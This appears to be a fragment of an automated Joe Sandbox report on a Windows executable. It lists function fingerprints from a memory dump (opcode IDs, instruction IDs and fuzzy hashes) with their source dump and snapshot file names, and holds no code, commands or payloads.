                                                                                                                                                                                                                                              • Instruction ID: 8a214a05a26fc8f928125f8fb48cb90f3e515442b7647201508495c5dbe42c78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54105d90293e4b8a7fe8cebbefda0a172f6c9cbfe66afa0c85e262d0473a1c3c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA4127B2B193504BD71CCF258CA275FFBA2EBC5308F16883DE5869B284CA7494078B45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                                                                                                                                                                              • Instruction ID: 504e49b0b2ddc2a099550f91d12c5185d5b4ceea0bdb26274afb8cde00bc0dbb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91220374a97f5aff33aa7e71888e41c88829f78e25f822e198eb2ef461918297
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5314632A083385B83249E5D8982067F7E8EBCD714F1AE12FD884E7311E574ED0147C5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                                                                                                                                                                              • Instruction ID: d5ab4806ffe72a1369b891b0c03ce99b48dccca7df38fd9f7e726c1ee5c76a78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dc7dffa9da4718634bc1df2c87a66b7a70c35b3b00ffd698cd8eaa02142161
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 250124347A0A01DBE7258B15A891BB37293FB82310FA49029E18293281DB69AC91875D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                                                                                                                                                                              • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                                                                                                                                                                              • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                                                                                                                                                                              • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000B.00000002.3093057838.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_400000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                                                                                                                                                                              • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C